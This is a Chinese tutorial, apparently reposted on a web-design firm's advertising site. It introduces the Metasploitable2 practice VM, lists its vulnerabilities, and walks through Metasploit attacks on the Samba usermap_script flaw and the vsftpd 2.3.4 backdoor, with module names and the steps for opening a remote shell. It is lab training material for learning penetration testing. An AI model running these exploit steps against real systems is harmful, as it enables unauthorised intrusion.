189 8069 5689

如何分析Metasploit中的Metasploitable2

本篇文章为大家展示了如何分析Metasploit中的Metasploitable2,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

成都创新互联公司成立与2013年,是专业互联网技术服务公司,拥有项目成都网站建设、网站建设网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元长岛做网站,已为上家服务,为长岛各地企业和个人服务,联系电话:13518219792

一、Metasploitable2简介

       Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。    

       开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。     

       下载地址:    

       https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

       用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、MySQL、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞 

3、Vsftpd源码包后门漏洞 

4、UnreallRCd后门漏洞 

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破) 

9、Distcc后门漏洞 

10、Samba sysmlink默认配置目录遍历漏洞 

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞 

13、Ingreslock后门漏洞 

14、Rlogin后门漏洞

三、Samba MS-RPC Shell命令注入漏洞 

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。 

攻击机:kali linux IP:192.168.1.133 

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

如何分析Metasploit中的Metasploitable2

2、搜索可利用的模块:search samba

如何分析Metasploit中的Metasploitable2

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options 

 需要设置目标ip和端口(默认139)

如何分析Metasploit中的Metasploitable2

4、设置目标主机地址:192.168.1.131 

如何分析Metasploit中的Metasploitable2

5、运行:run 此时已建立shell连接

如何分析Metasploit中的Metasploitable2

6、查看目标主机目录文件:ls

如何分析Metasploit中的Metasploitable2

四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。 

攻击机:kali linux IP:192.168.1.133 

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd

如何分析Metasploit中的Metasploitable2

2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 

查看需要设置的参数:show options 

 需要设置目标ip和端口(默认21)

如何分析Metasploit中的Metasploitable2

3、设置目标主机地址:192.168.1.136 

如何分析Metasploit中的Metasploitable2

4、 运行:run 此时已建立shell连接

如何分析Metasploit中的Metasploitable2

5、查看目标主机目录文件:ls

如何分析Metasploit中的Metasploitable2

上述内容就是如何分析Metasploit中的Metasploitable2,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。


名称栏目:如何分析Metasploit中的Metasploitable2
网站路径:http://jkwzsj.com/article/gdodgp.html

其他资讯